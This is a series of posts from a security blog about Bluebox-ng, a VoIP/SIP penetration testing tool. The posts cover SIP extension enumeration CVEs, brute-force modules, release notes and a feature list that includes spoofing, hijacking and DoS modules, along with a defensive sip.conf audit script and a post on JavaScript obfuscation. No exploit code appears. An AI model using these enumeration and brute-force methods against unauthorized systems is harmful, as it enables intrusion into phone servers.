Ni ceros ni unos ...... mind overflow ...
<h3>SIP extension enumeration in Bluebox-ng</h3>
2013-09-25<br />
There are some well known SIP extension enumeration vulnerabilities in different VoIP servers, especially in Asterisk. This brute-force vector is based on studying the authentication responses of the target server: sometimes its replies differ when the client uses a valid extension, so valid extensions are easy to discover.<br />
<br />
This vector is normally classified as a low security risk. Moreover <a href="http://www.sinologic.net/blog/2012-03/llamame-a-mi-correo-electronico.html" target="_blank">we're moving towards a federated SIP environment</a>, in which the extension is the public email address of the user. But it's still important in some cases:<br />
<ul>
<li>To guide the next steps during a penetration test. For example, you can use the discovered extensions to reduce the number of attempts in the SIP brute-force phase.</li>
<li>Some RCE (Remote Code Execution) <a href="http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/" target="_blank">exploits</a> need a valid extension to work.</li>
</ul>
<div>
After a little research, these are the known vulns:</div>
<div>
<ul>
<li><a href="http://www.cvedetails.com/cve/CVE-2009-3727/" target="_blank">CVE-2009-3727</a>: It's quite old and practically never found in real environments. It's not implemented in Bluebox-ng yet; it's waiting for the complete rewrite of the SIP stack that <a href="https://twitter.com/pamojarpan" target="_blank">Damián</a> is working on.</li>
<li><a href="http://www.cvedetails.com/cve/CVE-2011-2536/" target="_blank">CVE-2011-2536</a>: It's much more common than the previous one. The "alwaysauthreject" option the CVE talks about is disabled by default in old versions of Asterisk, and leaving it disabled is a common bad practice in current ones. Bluebox-ng implements it in the "sip-brute-ext" module. In <a href="http://nicerosniunos.blogspot.com.es/2011/09/voip-information-gathering-metasploit.html" target="_blank">this old post</a> I go a bit deeper into the method used.</li>
<li>(No CVE): This technique uses INVITE requests; in some situations Asterisk allows the same enumeration even with the "alwaysauthreject" parameter enabled. They were discovered by Francesco Tornieri and published on <a href="http://packetstormsecurity.com/search/?q=francesco+tornieri+SIP+User+Enumeration&s=files" target="_blank">Packet Storm</a>. Now the same Bluebox-ng module implements it too. So <a href="https://twitter.com/dvirus" target="_blank">@dvirus</a>, you can now use it against your <a href="http://busy-tone.org/2012/11/busy-tone-vulnerable-pbx/" target="_blank">Busy Tone VulnPBX</a> virtual machine ;).</li>
</ul>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7_h8tClWfXyDV93vDdYwS81kOOe6cSWbQzUHSWiNVkAEveSdhWhem3WJId8PZXQ5ZUCnbMILIB7aYuHW1DqXhg6THXT0kyUUAORrhyhnQxMFfX1-MFa7Dc8kBzpf_lBsZKw-o4JeMlRY/s1600/Captura+de+pantalla+de+2013-09-25+14:09:01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7_h8tClWfXyDV93vDdYwS81kOOe6cSWbQzUHSWiNVkAEveSdhWhem3WJId8PZXQ5ZUCnbMILIB7aYuHW1DqXhg6THXT0kyUUAORrhyhnQxMFfX1-MFa7Dc8kBzpf_lBsZKw-o4JeMlRY/s400/Captura+de+pantalla+de+2013-09-25+14:09:01.png" width="400" /></a></div>
<ul>
<li><a href="http://www.cvedetails.com/cve/CVE-2011-4597/" target="_blank">CVE-2011-4597</a>: It's similar to the other ones, but this time the server (Asterisk) answers from a different port when a valid extension exists, due to a specific NAT-related setup. This technique is supported through the "sip-brute-ext-nat" module.</li>
</ul>
</div>
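All the enumeration vectors above hinge on one sip.conf setting (alwaysauthreject), and the INVITE attack post further down in this blog hinges on another (allowguest). The checker below is an added example, not Bluebox-ng code nor part of the original post: it parses an Asterisk sip.conf and reports both weak settings. The two sample configs embedded in it are constructed for the example.<br />

```python
"""Audit an Asterisk sip.conf for the two settings these posts discuss.

- alwaysauthreject: when "no" (or unset on old Asterisk versions) the
  authentication replies differ for valid and invalid extensions, which
  is the behaviour behind CVE-2011-2536.
- allowguest: when "yes" (the Asterisk default) unauthenticated INVITEs
  are accepted and land in the context that [general] points at.

The parser covers the sip.conf syntax Asterisk uses: ";" comments,
[section] headers with optional template markers such as [tmpl](!) or
[1000](tmpl), and "key=value" or "key => value" assignments. It does not
resolve template inheritance or #include directives. The sample configs
below are constructed for this example, not taken from any deployment.
"""
import re
from typing import Dict, List, Tuple

SECTION_RE = re.compile(r"^\[([^\]]+)\](?:\([^)]*\))?\s*$")
ASSIGN_RE = re.compile(r"^([\w.-]+)\s*=>?\s*(.*)$")


def parse_sip_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Return {section: {key: value}}; a repeated key keeps its last value."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # strip ';' comments
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).strip()
            sections.setdefault(current, {})
            continue
        m = ASSIGN_RE.match(line)
        if m and current is not None:
            sections[current][m.group(1).lower()] = m.group(2).strip()
    return sections


def audit_sip_conf(text: str) -> List[Tuple[str, str]]:
    """Return (severity, message) findings for the [general] section."""
    general = parse_sip_conf(text).get("general", {})
    findings: List[Tuple[str, str]] = []

    aar = general.get("alwaysauthreject")
    if aar is None:
        findings.append(("WARN", "alwaysauthreject is not set in [general]; old "
                         "Asterisk versions default it to no, so set it to yes explicitly"))
    elif aar.lower() != "yes":
        findings.append(("HIGH", f"alwaysauthreject={aar}: REGISTER/INVITE replies "
                         "reveal which extensions exist (CVE-2011-2536)"))

    guest = general.get("allowguest", "yes")  # Asterisk default is yes
    if guest.lower() != "no":
        context = general.get("context", "default")
        findings.append(("HIGH", f"allowguest={guest}: unauthenticated INVITEs are "
                         f"accepted into context '{context}'"))
    return findings


# Constructed sample: the weak setup both posts warn about.
WEAK_CONF = """\
[general]
context=default          ; guest calls land here
allowguest=yes
; alwaysauthreject left at its (old) default

[friend-tmpl](!)
type=friend
host=dynamic

[1000](friend-tmpl)
secret=CHANGE-ME-placeholder
"""

# Constructed sample: the hardened counterpart.
HARDENED_CONF = """\
[general]
context=default
alwaysauthreject=yes     ; identical rejections for any extension
allowguest=no            ; every INVITE must authenticate
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name} ==")
        for severity, message in audit_sip_conf(conf) or [("OK", "no findings")]:
            print(f"[{severity}] {message}")
```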
<div>
Finally, I've also solved an important problem with asynchrony in the "sip-brute-pass" module, which made it very annoying to run a serious penetration test. :)</div>
<div>
<br /></div>
<div style="text-align: center;">
<a href="https://github.com/jesusprubio/bluebox-ng">https://github.com/jesusprubio/bluebox-ng</a></div>
<h3>More brute-force modules in Bluebox-ng</h3>
2013-09-16<br />
The other day I said that we're now going to automate all the VoIP tasks, trying to build a VoIP/UC vulnerability scanner. But I realized that there are some other tasks that I need in every penetration test which we could add too. This way we can avoid using other tools for an important part of the work.<br />
<br />
Normally we're hired to do a VoIP-specific penetration test, but we also like to check (in a minimal way) the rest of the services involved. So I've added the following brute-force modules:<br />
<br />
<ul>
<li><b>Asterisk AMI</b>: It was a must because this is a very common scenario.</li>
<li><b>MySQL</b>: The most common DB engine among VoIP servers.</li>
<li><b>MongoDB</b>: It's not used in VoIP, but I've been playing lately with this system and I really like it. So I decided also to add a module.</li>
<li><b>SSH / (S)FTP</b>: More common protocols.</li>
<li><b>HTTP(S)</b>: Useful when we find a web management panel for a VoIP server.</li>
<li><b>TFTP</b>: Widely used in VoIP to <a href="http://bhagwad.hubpages.com/hub/What-is-Auto-Provisioning-in-VoIP-Phones" target="_blank">auto-provision</a> the softphones of an organization.</li>
<li><b>LDAP</b>: Sometimes the VoIP servers authenticate against an existing LDAP instance (Microsoft Active Directory is included here too).</li>
</ul>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmntjaU_7XhL4xoyqoKGKhIrz7_uiafhkCeypyp8MXXmrm6ctErYIR425d4DtORdEoO9tlK4B0mck8bEH5fRxb4ZWdlBGPxH9kxheDx7NuxfWdzRBjXIeVFBTVw5fZHMVwUW1T34ZHkn0/s1600/Captura+de+pantalla+de+2013-09-15+11:11:53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmntjaU_7XhL4xoyqoKGKhIrz7_uiafhkCeypyp8MXXmrm6ctErYIR425d4DtORdEoO9tlK4B0mck8bEH5fRxb4ZWdlBGPxH9kxheDx7NuxfWdzRBjXIeVFBTVw5fZHMVwUW1T34ZHkn0/s400/Captura+de+pantalla+de+2013-09-15+11:11:53.png" width="400" /></a></div>
<br />
Finally, I would like to remark that, in my opinion, we should solve the following issues to build a professional tool:<br />
<br />
<ul>
<li>Network scanner: For now we're using <a href="https://github.com/eviltik/evilscan" target="_blank">Evilscan</a>, but it only supports full TCP scans (neither SYN nor UDP) and the project seems to have stopped.</li>
<li>Web vulnerability scanner: I don't know of any tool for this written in Node.js. The most similar thing I found is <a href="https://code.google.com/p/dirscan-node/" target="_blank">Dirscan-node</a>, useful for directory brute-force but not a complete web vuln scanner.</li>
</ul>
<br />
In fact, I'm using <a href="http://nmap.org/" target="_blank">Nmap</a> and <a href="https://code.google.com/p/skipfish/" target="_blank">Skipfish</a> to achieve these goals for now. So if you're thinking about a new security project (in Node.js), these ideas could be a good one. ;)
<h3>Bluebox-ng beta released</h3>
2013-09-06<br />
I've just pushed the last changes to the <a href="https://github.com/jesusprubio/bluebox-ng" target="_blank">Bluebox-ng repo</a> to get what we consider a beta version. It's not finished yet, but it's much more stable than the previous release. Here is a summary of the changelog:<br />
<br />
<ul>
<li>IPv6 support. I would like to thank Olle E. Johansson (<a href="https://twitter.com/oej" target="_blank">@oej</a>) for <a href="http://edvina.net/blog/category/tech/ipv6-tech/" target="_blank">his research on SIP and IPv6</a>; it made my work really easy.</li>
<li><a href="http://exploitsearch.net/">Exploitsearch.net</a> API support.</li>
<li>DNS module finished.</li>
<li>Nicer outputs.</li>
<li>Simpler setup process.</li>
<li>A network host/port scanner (<a href="https://github.com/eviltik/evilscan" target="_blank">Evilscan</a>).</li>
<li><a href="https://code.google.com/p/dirscan-node/" target="_blank">Dirscan-node</a> upgraded to version 0.5.</li>
<li>Added some numerical lists (with different paddings) to use with brute-force modules.</li>
<li>Host list files and port ranges support included in SipScan module.</li>
<li>Solved the SipBrutePass module problem with too many asynchronous requests.</li>
<li>A lot of refinements in the whole code.</li>
</ul>
<br /><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFuAqXw7Mg7Ackh5TPm3MPBvhvskJ9IWTnUEv_IaqSTz7Qz_sDYOlpEtZefeWiU8cmIaoTzBG_WU-qoBZjkcYiGJyQG-Q72n3ibZHdEOHdMWbJ1jY5bw642b-b6BOEWg5aSQ1KG_fWoF4/s1600/Captura+de+pantalla+de+2013-09-05+16:43:20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFuAqXw7Mg7Ackh5TPm3MPBvhvskJ9IWTnUEv_IaqSTz7Qz_sDYOlpEtZefeWiU8cmIaoTzBG_WU-qoBZjkcYiGJyQG-Q72n3ibZHdEOHdMWbJ1jY5bw642b-b6BOEWg5aSQ1KG_fWoF4/s400/Captura+de+pantalla+de+2013-09-05+16:43:20.png" width="400" /></a></div>
<br />
I want to say that we've decided to redefine the project as a "VoIP/UC vulnerability scanner"; this way we can work in a more focused way. Our idea is to write a tool to test our deployments automatically. There are several options when we think about other environments such as the web (<a href="https://code.google.com/p/skipfish/" target="_blank">Skipfish</a>, <a href="http://www.cirt.net/nikto2" target="_blank">Nikto</a>, <a href="http://w3af.org/" target="_blank">W3af</a>, etc.), but there's nothing similar for VoIP.<br />
<br />
For now we have a bunch of tools (modules) that do the job in a comfortable (but independent) way. So it's time to join all of them to automate the different tasks needed when we do a specific VoIP penetration test.<br />
<br />
Finally, we hope to present the first stable version at <a href="http://gsickminds.net/" target="_blank">GSICKMINDS</a> (A Coruña, 24-25-26 October), a great security event which I recommend to everyone. We're going to have some <a href="http://gsickminds.net/ponencias.html" target="_blank">security pr0n stars</a> there, and we're in <a href="https://www.google.es/search?q=coru%C3%B1a&client=ubuntu&channel=cs&um=1&ie=UTF-8&hl=es&tbm=isch&source=og&sa=N&tab=wi&authuser=0&ei=rI4oUujSCu3X7AbpxIDoCw&biw=1241&bih=568&sei=rY4oUu6bL6WO7QbB3YDYDg" target="_blank">one of the best places</a> in the world to enjoy a few days. ;)
<h3>Bluebox-ng Alpha release</h3>
2013-06-10<br />
Finally I've pushed the first Alpha version of Bluebox-ng to my GitHub repo: <a href="https://github.com/jesusprubio/bluebox-ng">https://github.com/jesusprubio/bluebox-ng</a><br />
<div>
<br /></div>
<div>
<b>Features</b></div>
<div>
<ul>
<li>RFC compliant</li>
<li>TLS and IPv6 support</li>
<li>SIP over websockets (and WSS) support (draft-ietf-sipcore-sip-websocket-08)</li>
<li>SHODAN and Google Dorks</li>
<li>SIP common security tools (scan, extension/password bruteforce, etc.)</li>
<li>REGISTER, OPTIONS, INVITE, MESSAGE, SUBSCRIBE, PUBLISH, OK, ACK, CANCEL, BYE and Ringing requests support</li>
<li>Authentication through different types of requests.</li>
<li>SIP denial of service (DoS) testing</li>
<li>SRV and NAPTR discovery</li>
<li>Dumb fuzzing</li>
<li>Common VoIP servers web management panels discovery</li>
<li>Automatic exploit searching (Exploit DB, PacketStorm, Metasploit)</li>
<li>Automatic vulnerability searching (CVE, OSVDB)</li>
<li>Geolocation</li>
<li>Colored output</li>
<li>Command completion</li>
<li>GNU/Linux, Mac OS X and Windows</li>
</ul>
</div>
<div>
I'm sorry, but we still don't have documentation for the tool. For now, we have the README file included in the source code (which shows the steps to start the tool) and <a href="http://www.securitybydefault.com/2013/06/bluebox-ng-alpha-release.html" target="_blank">this other post on the Security by Default blog</a>, which includes some more screenshots of this first version.<br />
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbEXV4AyNaAbKjsNR2-zcnMBLip1cIXt6OZ0lhWdT-taCaT8fJyJTAA8Uz4f1jNHu7_-N8mwCk2adCxSa1wr1Shtj_kGrz0UPBfdGkEuRjnCmfGdW-HYmrD79unGL-jsNUSQuow4Zn2oc/s1600/Captura+de+pantalla+de+2013-06-09+14%253A45%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbEXV4AyNaAbKjsNR2-zcnMBLip1cIXt6OZ0lhWdT-taCaT8fJyJTAA8Uz4f1jNHu7_-N8mwCk2adCxSa1wr1Shtj_kGrz0UPBfdGkEuRjnCmfGdW-HYmrD79unGL-jsNUSQuow4Zn2oc/s400/Captura+de+pantalla+de+2013-06-09+14%253A45%253A28.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqSWo0fwVpgMV66eJE0ToHlMM2ukoa24exz1x0f_xo0N57HEgwqu-b2Bguj1reDMCEN2kAAl3rimpF16cZjA1SDwhkP4oBeB-T-sSmU95gqJTMyZFVAWnMgEXn55MwJxEfUzCSkLl3jxo/s1600/Captura+de+pantalla+de+2013-06-09+14%253A59%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqSWo0fwVpgMV66eJE0ToHlMM2ukoa24exz1x0f_xo0N57HEgwqu-b2Bguj1reDMCEN2kAAl3rimpF16cZjA1SDwhkP4oBeB-T-sSmU95gqJTMyZFVAWnMgEXn55MwJxEfUzCSkLl3jxo/s400/Captura+de+pantalla+de+2013-06-09+14%253A59%253A40.png" width="400" /></a></div>
</div>
<h3>My new toy: Bluebox-ng</h3>
2013-03-27<br />
<div class="separator" style="clear: both; text-align: left;">
Hi again guys, here is my new personal project. I think the README file is complete enough, so I'm pasting it into this post.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Next month I'll be with my colleague <a href="https://twitter.com/AntonRoman" target="_blank">Antón</a> at the <a href="http://conference.kamailio.com/k01/" target="_blank">Kamailio World Conference</a> showing a bit more about it. If you are there and want to talk a bit about VoIP security (or WebRTC), please get in touch with us. :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Finally, we would like to publish the first version in one or two months; sorry, but we're developing it mostly in our free time :(. I've promised <a href="https://twitter.com/YJesus" target="_blank">Yago</a> to do it on the <a href="http://www.securitybydefault.com/" target="_blank">Security by Default</a> blog, so stay tuned. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Moreover, this tool is included in the Quobis personal projects plan, so you can always follow <a href="http://planet.quobis.com/" target="_blank">Quobis planet</a>, where we publish all our experiments.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Nothing else, I hope you like it, and all kinds of suggestions (and coders) are welcome :).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="text-align: center;">
<span style="font-family: inherit; font-size: x-large; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/02AuYf66sx0?feature=player_embedded' frameborder='0'></iframe></span></div>
<div style="text-align: center;">
<br /></div>
<h3>
<span style="font-family: inherit; font-size: x-large; text-align: center;">Bluebox-ng</span></h3>
Bluebox-ng is a next generation UC/VoIP security tool. It has been written in CoffeeScript using Node.js powers. This project is "our 2 cents" to help to improve information security practices in VoIP/UC environments.<br />
<ul>
<li> GitHub repo: <a href="https://github.com/jesusprubio/bluebox-ng">https://github.com/jesusprubio/bluebox-ng</a></li>
<li>Demo: <a href="http://www.youtube.com/watch?v=02AuYf66sx0">http://www.youtube.com/watch?v=02AuYf66sx0</a></li>
</ul>
<div>
<br /></div>
<h3>
Install deps</h3>
<ul>
<li> cd bluebox-ng</li>
<li>npm install</li>
</ul>
<h3>
Run</h3>
<ul>
<li>npm start</li>
</ul>
<div>
<br /></div>
<h3>
Features</h3>
<ul>
<li>Automatic pentesting process (VoIP, web and service vulns)</li>
<li>SIP (RFC 3261) and extensions compliant</li>
<li>TLS and IPv6 support</li>
<li>VoIP DNS SRV register support</li>
<li>SIP over websockets (and WSS) support (draft-ietf-sipcore-sip-websocket-08)</li>
<li>REGISTER, OPTIONS, INVITE, MESSAGE, SUBSCRIBE, PUBLISH, OK, ACK, CANCEL, BYE, Ringing and Busy Here requests support</li>
<li>Extension and password brute-force through different methods (REGISTER, INVITE, SUBSCRIBE, PUBLISH, etc.)</li>
<li>DNS SRV registers discovery</li>
<li>SHODAN and Google Dorks</li>
<li>SIP common vulns modules: scan, extension brute-force, Asterisk extension brute-force (CVE-2011-4597), invite attack, call all LAN endpoints, invite spoofing, registering hijacking, unregistering, bye teardown</li>
<li>SIP DoS/DDoS audit</li>
<li>SIP dumb fuzzer</li>
<li>Common VoIP servers web management panels discovery and brute-force</li>
<li>Automatic exploit searching (Exploit DB, PacketStorm, Metasploit)</li>
<li>Automatic vulnerability searching (CVE, OSVDB)</li>
<li>Geolocation using WPS (Wifi Positioning System) or IP address (Maxmind database)</li>
<li>Colored output</li>
<li>Command completion</li>
</ul>
<div>
<br /></div>
<h3>
Roadmap</h3>
<ul>
<li> Tor support</li>
<li>More SIP modules </li>
<li>SIP Smart fuzzing (SIP Torture RFC)</li>
<li>Eavesdropping</li>
<li>CouchDB support (sessions)</li>
<li>H.323 support</li>
<li>IAX support</li>
<li>Web common panels post-exploitation (Pepelux research)</li>
<li>A bit of command Kung Fu post-exploitation</li>
<li>RTP fuzzing</li>
<li>Advanced SIP fuzzing with Peach</li>
<li>Reports generation</li>
<li>Graphical user interface</li>
<li>Windows support</li>
<li>Include in Debian GNU/Linux</li>
<li>Include in Kali GNU/Linux</li>
<li>Team/multi-user support</li>
<li>Documentation</li>
<li>...</li>
<li>Any suggestion/piece of code ;) is appreciated.</li>
</ul>
<div>
<br /></div>
<h3>
Author</h3>
Jesús Pérez<br />
<ul>
<li><a href="https://twitter.com/jesusprubio" target="_blank">@jesusprubio</a></li>
<li>jesusprubio gmail com</li>
<li><a href="http://nicerosniunos.blogspot.com/">http://nicerosniunos.blogspot.com/</a></li>
</ul>
<div>
<br /></div>
<h3>
Contributors</h3>
Damián Franco<br />
<ul>
<li><a href="https://twitter.com/pamojarpan" target="_blank">@pamojarpan</a></li>
<li>pamojarpan google com</li>
</ul>
Jose Luis Verdeguer<br />
<ul>
<li><a href="https://twitter.com/pepeluxx" target="_blank">@pepeluxx</a></li>
<li>pepelux enye-sec org</li>
<li><a href="http://www.pepelux.org/">http://www.pepelux.org/</a></li>
</ul>
<div>
<br /></div>
<h3>
Thanks to ...</h3>
<ul>
<li><a href="http://www.quobis.com/" target="_blank">Quobis</a>, some hours of work through personal projects program</li>
<li>Antón Román (<a href="https://twitter.com/antonroman" target="_blank">@AntonRoman</a>), he speaks SIP and I'm starting to speak it thanks to him</li>
<li>Sandro Gauci (<a href="https://twitter.com/sandrogauci" target="_blank">@sandrogauci</a>), SIPVicious was our inspiration</li>
<li>Kamailio community (<a href="https://twitter.com/kamailioproject" target="_blank">@kamailioproject</a>), my favourite SIP Server</li>
<li>David Endler and Mark Collier (<a href="https://twitter.com/markcollier46" target="_blank">@markcollier46</a>), authors of <a href="http://www.hackingvoip.com/" target="_blank">"Hacking VoIP Exposed" book</a></li>
<li>John Matherly (<a href="https://twitter.com/achillean" target="_blank">@achillean</a>) for SHODAN API and GHDB</li>
<li>All VoIP, free software and security hackers that we read everyday</li>
<li><a href="https://soundcloud.com/loopsize" target="_blank">Loopsize</a>, a music hacker (and a friend) creator of the themes included in demos</li>
</ul>
<div>
<br /></div>
<h3>
License</h3>
This program is free software: you can redistribute it and/or modify<br />
it under the terms of the GNU General Public License as published by<br />
the Free Software Foundation, either version 3 of the License, or<br />
(at your option) any later version.<br />
<br />
This program is distributed in the hope that it will be useful,<br />
but WITHOUT ANY WARRANTY; without even the implied warranty of<br />
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the<br />
GNU General Public License for more details.<br />
<br />
You should have received a copy of the GNU General Public License<br />
along with this program. If not, see <a href="http://www.gnu.org/licenses/">http://www.gnu.org/licenses/</a>.
<h3>How to protect your WebRTC app code?</h3>
2013-02-26<br />
I have spent some time analyzing the best way to protect a proprietary version of a webphone based on <a href="http://qoffeesip.quobis.com/" target="_blank">QoffeeSIP</a> that we are developing now at <a href="http://quobis.com/" target="_blank">Quobis</a>. I have seen this same question on different sites with quite confusing answers, so I'm going to share what I learned in case it helps anybody.<br />
<br />
Well, I'm not going to define what WebRTC is, because the Internet is full of it this year (<a href="http://www.youtube.com/watch?v=zi8VTeDHjcM" target="_blank">only overtaken by cats</a> ;). For our purposes we have to consider that our app is a JavaScript library. There is HTML/CSS code too, but I think the important part is the JavaScript; HTML/CSS can be protected in the same way with other tools.<br />
<br />
First of all I want to remark that protecting your code, in the sense of preventing anybody from copying, modifying and redistributing it, <b>is impossible</b>, since JavaScript is only text. Given enough time (or money), anybody could reverse this code. But, as always, we can do things to make it as hard as possible.<br />
<br />
In general, I found that there is some confusion between the terms minification and obfuscation, so let's talk a bit about these techniques.<br />
<br />
<b><span style="font-size: large;">Minification</span></b><br />
<br />
The goal is to get the code as small as possible. Obviously the generated code is harder to read, but it can be reversed fairly easily with tools like <a href="http://jsbeautifier.org/" target="_blank">JSbeautifier</a> (not always that easily, depending on the minifier used).<br />
<br />
Some common possible options at this point are:<br />
<br />
<ul>
<li><a href="https://github.com/mishoo/UglifyJS" target="_blank">UglifyJS</a>: The coolest thing right now xD. It is a Node.js package, so it's easy to include. Version 2 was published a few days ago. We will see that it's fast, really fast.</li>
<li><a href="https://developers.google.com/closure/compiler/" target="_blank">Google Closure Compiler</a>, which Google uses for its own apps. It is available as a Java command line tool, but there are <a href="https://github.com/weaver/scribbles/tree/master/node/google-closure/" target="_blank">node modules</a> that use the online API.</li>
<li><a href="http://yui.github.com/yuicompressor/" target="_blank">YUI Compressor</a> from Yahoo: it was the de facto standard, but the newer alternatives are now beating it.</li>
</ul>
A little comparison (I can't find the original link, sorry :( ):<br />
<ul>
<li>Average time: (lower is better)</li>
<ul>
<li>UglifyJS: 0.11554 seconds</li>
<li>Closure: 1.41037 seconds</li>
</ul>
<li>Average reduction: (higher is better)</li>
<ul>
<li> UglifyJS: 45.6%</li>
<li>Closure: 51.5%</li>
</ul>
</ul>
NOTE: <a href="http://blog.foxxtrot.net/2010/12/a-comparison-of-javascript-compressors.html" target="_blank">Another one</a> (more complete) with YUI included too.<br />
<br />
In my experience the code generated by Google Closure is better because, besides minification, it includes code checking too: it provides warnings for dangerous or illegal JavaScript. Moreover, I like that you can use <a href="http://closure-compiler.appspot.com/home" target="_blank">this online service</a> to check your code while developing.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEs7en8XdyZj2nuXpPUOTyoFfmNcVgYMF7SlyUaNGcDGurwvzVjWo8rapaysMFg6wRD1Vu7VfuUTcIgwls5MmTfGPiVCYwgleNFhcD4zFWPIHmpcW8G0D2-2BrU4dYhuUdmGsb8irV3Uo/s1600/Captura+de+pantalla+de+2013-02-26+11:20:15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="215" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEs7en8XdyZj2nuXpPUOTyoFfmNcVgYMF7SlyUaNGcDGurwvzVjWo8rapaysMFg6wRD1Vu7VfuUTcIgwls5MmTfGPiVCYwgleNFhcD4zFWPIHmpcW8G0D2-2BrU4dYhuUdmGsb8irV3Uo/s400/Captura+de+pantalla+de+2013-02-26+11:20:15.png" width="400" /></a></div>
<br />
<br />
<b><span style="font-size: large;">Obfuscation</span></b><br />
<br />
It is defined as <i>"the hiding of intended meaning in communication, making communication confusing, wilfully ambiguous, and harder to interpret."</i> (Wikipedia).<br />
<br />
We have some options here when we are working with a web app:<br />
<ul>
<li><b>Encrypt the transport layer</b>: needed to prevent other users on the same LAN from sniffing it. So serving the application over HTTPS is a must.</li>
<li><b>Encryption</b>: Encrypt the application data and decrypt it on the fly with your own JavaScript encryption library.</li>
<li>Move functions to the server side, which is not possible in the case of WebRTC because we want end-to-end media.</li>
<li>Use a browser plugin, which makes no sense since one of the advantages of WebRTC is that the user doesn't have to install anything.</li>
<li>Implement the code as a Native Client module for the Chrome browser. The advantage is that common C code protections can be used and the app runs sandboxed. But it's not our case because we need multi-platform support.</li>
<li>To avoid legal issues you should <b>include a note (a JavaScript comment)</b> referencing the copyright in each copy of the .js library. Something similar to the <a href="http://www.gnu.org/philosophy/javascript-trap.html" target="_blank">Free Software Foundation recommendations</a> for free JavaScript code. An example could be:</li>
</ul>
NOTE: The @source tag is actually proposed by the FSF to include a link to the app's source code. But I think it could be a good idea to use it anyway, because browser plugins <a href="http://www.gnu.org/software/librejs/" target="_blank">that follow the recommendations</a> should "understand" it.<br />
<div>
<br /></div>
<div>
// @source: https://qoffeesip.quobis.com<br />
// Copyright (C) Quobis<br />
// Licensed under Quobis Commercial license<br />
// (http://www.quobis.com/licenses/commercial-1.0.html)<br />
<br />
I also want to point out some common obfuscation/encryption problems:<br />
<ul>
<li>Performance decrease, especially speed.</li>
<li>Harder troubleshooting.</li>
<li>Compatibility problems (IE!!).</li>
<li>Size increase.</li>
<li>As said above, a skilled expert can always reverse it and get code equivalent to ours.</li>
</ul>
All these problems are more serious in the case of encryption, except the last one, logically. So at this point we have several options, but I've narrowed them down to these:<br />
<ul>
<li>A paid option like <a href="https://jscrambler.com/" target="_blank">JsCrambler</a>: This is the reference tool; the generated code seems really difficult to recover and it supports a good number of encryption algorithms.</li>
<li>A free solution provided by my colleague <a href="https://twitter.com/pamojarpan">Damián</a>: <a href="https://github.com/TShadwell/Horrible.js">Horrible.js</a>. It implements obfuscation and an optional simple (and therefore light) encryption, controlled by the "factor" parameter. The next picture shows an example using it with the three different factors.</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjPhApuFDwmNXScMzs9ksrJMkT6JhkGZicWSc69384IYdWK0FTiKApppRCwr6HkwCN5jD0EJnsWuzFp0mghl3O9HL7bs7L8HLC-OuWp6En_AZJZD35-G85AgTxToViKdJNW3-nf3Qma0E/s1600/Captura+de+pantalla+de+2013-02-26+11%253A44%253A07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjPhApuFDwmNXScMzs9ksrJMkT6JhkGZicWSc69384IYdWK0FTiKApppRCwr6HkwCN5jD0EJnsWuzFp0mghl3O9HL7bs7L8HLC-OuWp6En_AZJZD35-G85AgTxToViKdJNW3-nf3Qma0E/s400/Captura+de+pantalla+de+2013-02-26+11%253A44%253A07.png" width="400" /></a></div>
<div>
<br />
Finally, if you don't like the ugly generated code you can always use <a href="https://github.com/TShadwell/Nice.js" target="_blank">Nice.js</a> to get something like this example: xD<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
